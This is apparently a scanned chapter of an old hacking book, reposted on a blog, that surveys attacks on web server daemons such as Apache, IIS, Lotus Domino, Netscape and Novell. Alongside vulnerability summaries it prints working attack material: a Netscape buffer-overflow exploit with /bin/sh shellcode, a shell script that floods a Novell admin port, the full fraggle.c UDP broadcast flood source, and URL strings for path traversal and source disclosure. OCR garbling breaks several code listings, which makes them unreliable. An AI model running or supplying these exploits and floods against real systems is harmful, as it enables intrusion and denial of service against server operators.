A daemon is a program associated with UNIX systems that performs maintenance functionality; it does not have to be called by the user, and is always running and ''listening" to a specified port for incoming service requests. Upon opening or activating one of these ports for communication, the program initiates a session to begin processing. Familiar types of daemons are those that handle FTP, telnet, or Web services. Web services on the Internet provide the Web-browsing foundation. Definitively, a Web server daemon (HTTPD) is a program that listens, customarily via TCP port 80, and accepts requests for information that are made according to the Hypertext Transfer Protocol (HTTP). The Web server daemon processes each HTTP request and returns a Web page document, as shown in Figure 9.5.
"3 Juhn Wilpy t Soni. Inr . PuHiihon ■ MihikhhiH Inli-inH h xp\
FJ* FjpjSilft Iwlj Hots.
about wiley | products | order what's new | For authors | search
John Wile^^Softs. Inc.t develops, publishes, ana sells products in print and electronic media for the educational, professional, scientific, technical, medical, and consumer ma rkets worldwide.
For belter performance, visit the site closest to you
Wiley Europe Mirror Site
Jacarandt Wiley Mirror Sire (Australia)
Dona ;.j-.-ii.v-
Figure 9.5 HTTP request.
In this section, we will investigate vulnerability secrets as they pertain to some of the more popular Web server daemons found on the Internet today. The HTTP server programs discussed include Apache, Lotus Domino, Microsoft Internet Information Server, Netscape Enterprise Server, Novell Web Server, OS/2 Internet Connection Server, and O'Reilly WebSite Professional.
Hacker's See Chapter 12 for information on using TigerSuite to discover a target Web server Note*:"J daemon.
Apache HTTP
The Apache HTTP server (www.apache.org), by the Apache Group, has been the most popular Internet Web server daemon since 1996. Among the reasons for this popularity is that the software comes free with UNIX platforms, and that it has been developed and maintained as an open-source HTTP server. Briefly, this means the software code is available for public review, critique, and combined modification. According to the Apache Group, the March 2000 Netcraft Web Server Survey found that over 60 percent of the Web sites on the Internet are using Apache (over 62 percent if Apache derivatives are included), thus making it more widely used than all other Web servers combined. Traditionally, Apache dominated the UNIX operating system platforms such as Linux, but new renditions have included support for Windows (see Figure 9.6) and Novell.
Liabilities
CGI Pilfering
Synopsis: Hackers can download and view CGI source code. Hack State: Code theft.
Vulnerabilities: Apache (version 1.3.12 in version 6.4 of SuSE)
Breach: Default installation and configuration of the Apache HTTP server daemon enables hackers to download CGI scripts directly from the Internet. Basically, the scripts stored in the /cgi-bin/ directory can be accessed, downloaded, and viewed, as opposed to host execution only.
Directory Listing
Synopsis: Hackers can exploit an Apache Win32 vulnerability to gain unauthorized directory listings.
Hack State: Unauthorized directory listing.
Breach: The exploit is caused when a path is too long as Apache searches for the HTTP startup file (e.g., index.html). The result is an unauthorized directory listing, regardless of the startup file existence.
Denial-of-Service Attack
Synopsis: Hackers can cause intensive CPU congestion, resulting in denial of services.
Hack State: Service obstruction.
Vulnerabilities: Apache HTTP Server versions prior to 1.2.5.
Breach: An attacker can cause intensive CPU congestion, resulting in denial of services, by initiating multiple simultaneous HTTP requests with numerous slash marks (/) in the URL.
Lotus Domino
Domino (http://domino.lotus.com) is a messaging and Web application software platform for companies whose objective is to improve customer respon-
siveness and streamline business processes. Domino is becoming popular as the Web server daemon for enterprise, service provider, and developer front ends. Lotus boasts Domino's capability to deliver secure, interactive Web applications and a solid infrastructure foundation for messaging. In other words, Domino is advertised as the integrator—taking away the worry about tying together multiple software products for messaging, security, management, and data allocation. Currently, you can design various applications with Java, JavaScript (see Figure 9.7), and HTML with the Domino Designer Java Editor and Virtual Machine (VM). With JavaScript and HTML support in the Notes client, you can devise applications that run on the Internet.
Liabilities
Embezzlement
Synopsis: Hackers can embezzle sensitive data in Domino-based Internet applications. Hack State: Data embezzlement. Vulnerabilities: All platforms.
Breach: Hackers can embezzle data by navigating to the portion of a Domino-based site used for processing payment information and removing everything to the right of the database name in the URL. In a common example of this breach, the entire database views were exposed; these views included a panorama containing previous registrations and one containing "All Documents." By clicking the collective link, a hacker can display the view that contains customer names, addresses, phone numbers, and payment information.
Remote Hacking
Synopsis: Documents available for viewing may be edited over the Internet. Hack State: Content hacking. Vulnerabilities: All platforms.
Breach: An attacker can exploit access rights for documents available through Domino that allow user-editing capabilities. By modifying the URL, the browser will send "EditDocument," instead of "OpenDocument," so that vulnerable locations display the document in Edit view, allowing the attacker to modify the file data.
Remote Hacking
Synopsis: Documents may be edited over the Internet. Hack State: Content hacking. Vulnerabilities: All platforms.
Breach: By appending domcfg.nsf/?open to a target URL, an attacker can easily determine remote database-editing capabilities. At this point, without password authentication, the target documents are vulnerable to read/write attributes.
Microsoft Internet Information Server
Internet Information Server (IIS) (Figure 9.8) by Microsoft (www.microsoft .com/iis) is currently gaining headway on the UNIX Apache server as one of the most popular Web service daemons on the Internet. Windows NT Server's built-in Web daemon, IIS, makes it easy to collaborate internally as an intranet server; and, as the fastest Web server for Windows NT, it is completely integrated with Windows NT Directory Services. The IIS Active Server Pages (ASP) tender an advanced, open, noncompilation application environment in which you can combine HTML, scripts, and reusable ActiveX server components to create dynamic, secure Web-based business solutions. With FrontPage, Microsoft makes it easy to integrate custom Web design into current HTML pages or to create new projects. Another function is the easy-to-use GUI administration module. With the
Подпись: Microsoft Internet Service Manager, Internet/intranet service daemon configuration is just a click away.
Denial-of-Service Attacks
Synopsis: Malformed GET requests can cause service interruption. Hack State: Service obstruction. Vulnerabilities: IIS v.3/4.
Breach: An HTTP GET is comparable to a command-line file-grabbing technique, but through a standard browser. An attacker can intentionally launch malformed GET requests to cause an IIS DoS situation, which consumes all server resources, and therefore "hangs" the service daemon.
Synopsis: The Sioux DoS penetration can cause immediate CPU congestion.
Hack State: Severe congestion.
Vulnerabilities: IIS v.3/4.
Breach: Sioux.c (available on this book's CD), by Dag-Erling Coidan Sm0rgrav, DoS penetration causes an immediate increase of CPU utilization to 85 percent. Multiple DoS attacks cause sustained
CPU congestion from 45 to 80 percent, and up to 100 percent if simultaneously flooding IIS with HTTP requests.
Embezzling ASP Code
Synopsis: ASP vulnerability with alternate data streams. Hack State: Code embezzlement. Vulnerabilities: IIS v.3/4.
Breach: URLs and the data they contain form objects called streams. In general, a data stream is accessed by referencing the associated filename, with further named streams corresponding to flename:stream. The exploit relates to unnamed data streams that can be accessed using filename::$DATA. A hacker can open www.target.com/file.asp::$DATA and be presented with the source of the ASP code, instead of the output.
Trojan Uploading
Synopsis: A hacker can execute subjective coding on a vulnerable IIS daemon. Hack State: Unauthorized access and code execution. Vulnerabilities: IIS v.4
Breach: A daemon's buffer is programmed to set aside system memory to process incoming data. When a program receives an unusual surplus of data, this can cause a "buffer overflow" incidence. There is a remotely exploitable buffer overflow problem in IIS 4.0 .htr/ism.dll code. Currently, upwards of 85 percent of IIS Web server daemons on the Internet are vulnerable by redirecting the debugger's instruction pointer (eip) to the address of a loaded dll. For more information, see ftp://ftp.technotronic.com/microsoft/iishack.asm.
Netscape Enterprise Server
As a scalable Web server daemon, Netscape Enterprise Server (www.netscape.com/enterprise) is frequently marketed for large-scale Web sites (see Figure 9.9). Voted Best of 1998 by PC Magazine, this Web daemon suite is powering some of the largest e-commerce, ISP, and portal Web sites on the Internet. Referenced Enterprise Server sites include E*Trade (www.etrade.com), Schwab (www.schwab.com), Digex (www.digex .com), Excite (www.excite.com), and Lycos (www.lycos.com). By providing features such as failover, automatic recovery, dynamic log
rotation, and content security, Enterprise Server usage has become a widespread commercial success.
Liabilities
Buffer Overflow
Synopsis: Older versions of Netscape are potentially vulnerable to buffer overflow attacks. Hack State: Buffer overflow.
Vulnerabilities: Previous UNIX versions.
Breach: The following CGI script, originally written by hacker/programmer Dan Brumleve, can be used to test the buffer overflow integrity of older UNIX flavors:
This is very tricky business. Netscape maps unprintable characters (0x80 - 0x90 and probably others) to 0x3f ("?"), so the machine code must be free of these characters. This makes it impossible to call int 0x80, so I put int 0x40 there and wrote code to shift those bytes left before it gets called. Also, null characters can't be used because of C string conventions. The first paragraph of the following turns the int 0x40 in the second paragraph into int 0x80. The second paragraph nullifies the
SIGALRM handler.
sub parse {
my $code = $pre
b0 55
eb 58
# popl %esi
56 # pushl %esi 5b # popl %ebx
43 43 43 43 43 43
43 43 43 43 43
# addl $0xb,%ebx
21 33 09 33
andl %esi,(%ebx)
orl %esi,(%ebx)
31 c0
66 b8 56 10 01 c4
c0 24 24 01 33 c0 b0 05 01 c4
c0 24 24 01 29 c4
66 b8 56 10 29 c4
xorl
movw
addl
shlb
xorl
movb
addl
shlb
subl
movw
subl
%eax,%eax
$0x1056,%ax
%eax,%esp
$1,(%esp)
%eax,%eax
$5,%al
%eax,%esp
$1,(%esp)
%eax,%esp
$0x1056,%ax
%eax,%esp
31 d2&
21 56 07
21 56 0f
b8 1b 56 34 12
35 10 56 34 12
$code .= "/bin/sh";
my $transmission = parse qw{
6f 63 65 61 6e 20 64 65 73 65 72 74 20 69 72 6f 6e # inguz
20 66 65 72 74 69 6c 69 7a 61 74 69 6f 6e 20 70 68 # inguz
79 74 6f 70 6c 61 6e 6b 74 6f 6e 20 62 6c 6f 6f 6d # inguz
20 67 61 74 65 73 20 73 6f 76 65 72 65 69 67 6e 74 # inguz 79
};
my $nop = "\ x90"; # this actually gets mapped onto 0x3f, but it do esn't seem
# to matter
my $address = "\x10\xdb\xff\xbf"; # wild guess, intended to be some where
in the chunk of nops. works
on every
linux box i've tried it on
so far.
my $len = 0x1000 - length($pre);
($nop x $len) . $cod
my $exploit = ($nop x 1138) . ($address x 3) e;
the first $address is in the string replaces another
pointer in the same function which gets dereferenced
after the buffer is overflowed. there must be a valid
address there or it will segfault early.
Structure Discovery
Synopsis: Netscape Enterprise Server can be exploited to display a list of directories and subdirectories during a discovery phase to focus Web-based attacks.
Hack State: Discovery.
Vulnerabilities: Netscape Enterprise Server 3x/4.
Breach: Netscape Enterprise Server with ''Web Publishing" enabled can be breached to display the list of directories and subdirectories, if a hacker manipulates certain tags:
http://www.example.com/?wp-cs-dump
482
This should reveal the contents of the root directory on that Web server. Furthermore, contents of subdirectories can be obtained. Other exploitable tags include:
?wp-ver-info
?wp-html-rend
?wp-usr-prop
?wp-ver-diff
?wp-verify-link
?wp-start-ver
?wp-stop-ver
?wp-uncheckout
Novell Web Server
As a competitor in the Web server market, Novell (www.novell.com) offers an easy way to turn existing NetWare 4.11 server into an intranet/Internet server. With an integrated search engine, SSL 3.0 support, and enhanced database connectivity, Novell's new Web server is an ideal platform for many "Novell" corporate infrastructures. In addition, the partnership of Novell and Netscape, to form a new company called Novonyx, has been working on a compilation of Netscape SuiteSpot-based software for NetWare.
Liabilities
Denial-of-Service Attack
Synopsis: Novell services can be interrupted with a DoS TCP/UDP attack. Hack State: System crash. Vulnerabilities: Netware 4.11/5.
Breach: Using Novell Web Server, and running the included tcpip.nlm module, opens a DoS vulnerability that permits an attacker to assault echo and chargen services.
Port: 7
Service: echo
Hacker's Strategy: This port is associated with a module in communications or signal transmitted (echoed) back to the sender that is distinct from the original signal. Echoing a message to the main computer can help test network connections. PING is the primary message-generation utility executed. The crucial issue with port 7's echo service pertains to systems that attempt to process oversized packets. One variation of a susceptible echo overload is performed by sending a fragmented packet larger than 65,536 bytes in length, causing the system to process the packet incorrectly, potentially resulting in a system halt or reboot. This problem is commonly referred to as the "Ping of Death Attack." Another common deviant to port 7 is known as "Ping Flooding." This frequent procedure also takes advantage of the computer's responsiveness, with a continual bombardment of PINGs or ICMP echo requests, overloading and congesting system resources and network segments.
Port: 19
Service: chargen
Hacker's Strategy: Port 19 and its corresponding service daemon, chargen, seem harmless enough. The fundamental operation of this service can be easily deduced from its name, a contraction of character stream generator. Unfortunately, this service is vulnerable to a telnet connection that can generate a string of characters with the output redirected to a telnet connection to, for example, port 53 (DNS). In this example, the flood of characters causes an access violation fault in the DNS service, which is then terminated, resulting in disruption of name resolution services.
Using arnudp.c by hacker guru Arny involves sending a UDP packet to the chargen port on a host with the packet's source port set to echo, and the source address set to either localhost or broadcast. UDP packets with a source address set to an external host are unlikely to be filtered and would be a communal choice for hackers.
Exploit Discovery
Synopsis: Novell Web Server can be exploited to reveal the full Web path on the server, during a discovery phase, to focus Web-based attacks.
Hack State: Discovery.
Vulnerabilities: GroupWise 5.2 and 5.5.
Breach: The help argument in module GWWEB.EXE reveals the full Web path on the server:
http://server/cgi-bin/GW5/GWWEB.EXE?HELP=bad-request
A common reply would be
File not found: SYS:WEB\CGI-BIN\GW5\US\HTML3 \HELP\BAD-REQUEST.HTM
Referring to the path returned in this example, an attacker can obtain the main Web site interface by sending the following:
http://server/cgi-bin/GW5/GWWEB.EXE?HELP=../../../../../index Remote Overflow
Synopsis: A remote hacker could cause a DoS buffer overflow via the Web-based access service by sending a large GET request to the remote administration port.
Hack State: Unauthorized access and code execution.
Vulnerabilities: GroupWise 5.2 and 5.5.
Breach: There is a potential buffer overflow vulnerability via remote HTTP (commonly, port 8008) administration protocol for Netware servers. The following is a listing of this exploit code:
nwtcp.c
#!/bin/sh
SERVER=127.0.0.1
PORT=8008 WAIT=3
DUZOA="perl -e '{ print "A"x4093} 's MAX=3 0
while :; do
ILE=0
while [ $ILE -lt $MAX ]; do (
(
echo "GET /" echo $DUZOA echo
) | nc $SERVER $PORT & sleep $WAIT kill -9 $! ) &>/dev/null &
ILE=$[ILE+1] done
sleep $WAIT done
O'Reilly WebSite Professional
Rated as one of the fastest-growing personal and corporate Internet server daemons, WebSite Professional (http://website.oreilly.com) is among the most robust Web servers on the market (see Figure 9.10). With custom CGI and Perl support, plus VBScript, JavaScript, Python, and Microsoft ASPA scripting standardization, this suite is unmatched in ease of use and programmability. With
this product, an average neophyte could fabricate a standard Web server configuration in minutes.
Liabilities
Denial-of-Service Attack
Synopsis: WebSite Professional is vulnerable to a DoS attack that can cause immediate CPU congestion, resulting in service encumbrance.
Hack State: Severe congestion.
Vulnerabilities: All revisions.
Breach: This DoS penetration attack (fraggle.c) causes an immediate jump to 100 percent system CPU utilization. Multiple DoS attacks cause sustained CPU congestion from 68 to 85 percent, and up to 100 percent if simultaneously flooded with HTTP requests.
Fraggle.c
struct pktinfo {
int ps; int src; int dst;
} ;
void fraggle (int, struct sockaddr_in *, u_long dest, struct pktinf o *);
void sigint (int);
unsigned short checksum (u_short *, int); int main (int argc, char *argv[])
{
struct sockaddr_in sin;
struct hostent *he;
struct pktinfo p;
int s, num, delay, n, cycle;
char **bcast = malloc(1024), buf[32];
FILE *bfile;
/* banner */
fprintf(stderr, "\nfraggle.c by TFreak\n\n");
/* capture ctrl-c */
signal(SIGINT, sigint);
/* check for enough cmdline args */
if (argc < 5)
{
fprintf(stderr, "usage: %s "
" [dstport] [srcport] [psize] \n\n"
"target\t\t= address to hit\n"
"bcast file\t= file containing broadcast add
rs\n"
"num packets \t= send n packets (n = 0 is consta
nt)\n"
"packet delay\t= usleep() between packets (in m
s)\n"
"dstport\t\t= port to hit (default 7)\n" "srcport\t\t= source port (0 for random) \n" "ps\t\t= packet size\n\n", argv[0]);
exit(-1);
}
/* get port info */ if (argc >= 6)
p.dst = atoi(argv[5]);
else
p.dst = 7; if (argc >= 7)
p.src = atoi(argv[6]);
else
p.src = 0;
/* packet size redundant if not using echo port */ if (argc >= 8)
p.ps = atoi(argv[7]);
else
p.ps = 1; /* other variables */ num = atoi(argv[3]); delay = atoi(argv[4]); /* resolve host */ if (isdigit(*argv[1]))
sin.sin_addr.s_addr = inet_addr(argv[1]);
else
{
if ((he = gethostbyname(argv[1])) == NULL) {
fprintf(stderr, "Can't resolve hostname!\n\n"); exit( -1);
}
memcpy( (caddr_t) &sin.sin_addr, he->h_addr, he->h_length);
}
sin.sin_family = AF_INET;
sin.sin_port = htons(0);
/* open bcast file and build array */
if ((bfile = fopen(argv[2], "r")) == NULL)
{
perror("opening broadcast file"); exit(-1);
}
n = 0;
while (fgets(buf, sizeof buf, bfile) != NULL)
{
buf[strlen(buf) - 1] = 0;
if (buf[0] == '#' || buf[0] == '\n' || ! isdigit(buf[0]))
continue;
bcast[n] = malloc(strlen(buf) + 1);
strcpy(bcast[n], buf);
n++;
}
bcast[n] = '\ 0';
fclose(bfile);
/* check for addresses */
if (!n) {
fprintf(stderr, "Error: No valid addresses in file!\n\n"); exit(-1);
}
/* create our raw socket */
if ((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) <= 0)
{ perror("creating raw socket"); exit(-1);
printf("Flooding %s (. = 25 outgoing packets)\n", argv[1]); for (n = 0, cycle = 0; n < num || !num; n++)
{
if (!(n % 25)) {
printf(".");
fflush(stdout);
}
srand(time(NULL) * rand() * getpid()); fraggle(s, &sin, inet_addr(bcast[cycle]), &p);
if (bcast[++cycle] == NULL)
cycle = 0; usleep(delay);
}
sigint(0);
}
void fraggle (int s, struct sockaddr_in *sin, u_long dest, struct p ktinfo *p)
{
struct iphdr *ip; struct udphdr *udp; char *packet; int r;
packet = malloc(sizeof(struct iphdr) + sizeof(struct udphdr) p->ps);
ip = (struct iphdr *)packet;
udp = (struct udphdr *) (packet + sizeof(struct iphdr)); memset(packet, 0, sizeof(struct iphdr) + sizeof(struct udphdr) p->ps);
/* ip header */
ip->protocol = IPPROTO_UDP; ip->saddr = sin->sin_addr.s_addr; ip->daddr = dest; ip->version = 4;
ip->ttl = 255;
ip->tos = 0;
ip-
>tot_len = htons(sizeof(struct iphdr) + sizeof(struct udphdr) + p->ps);
ip->ihl = 5;
ip->frag_off = 0;
ip->check = checksum((u_short *)ip, sizeof(struct iphdr)); /* udp header */
udp->len = htons(sizeof(struct udphdr) + p->ps); udp->dest = htons(p->dst); if (!p->src)
udp->source = htons(rand());
else
udp->source = htons(p->src);
/* send it on its way */
r = sendto(s, packet, sizeof(struct iphdr) + sizeof(struct udph dr) + p->ps,
0, (struct sockaddr *) sin, sizeof(struct sockaddr_i
n));
if (r == -1) {
perror("\nSending packet"); exit(-1);
}
free(packet); /* free willy 2! */
}
unsigned short checksum (u_short *addr, int len)
{
register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0;
while (nleft > 1)
{
sum += *w++; nleft-- ;
}
if (nleft == 1)
{
*(u_char *) (&answer) = *(u_char *) w; sum += answer;
}
sum = (sum >> 17) + (sum & 0xffff); sum += (sum >> 17); answer = -sum; return (answer);
}
void sigint (int ignoremewhore)
{
fprintf(stderr, "\nDone!\n\n");
exit(0);
}
Conclusion
There are hordes of hack attack liabilities for gateways, routers, and Internet server daemons. In this chapter we reviewed some of those that are more common among those exploited in the Underground. The Tiger Tools repository on the CD in the back of this book can help you search for those liabilities particular to your analysis. Also be sure to check www.TigerTools.net for the necessary tools and exploit code compilations. Let's move on to the next chapter and discuss hack attack penetrations on various operating systems.
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment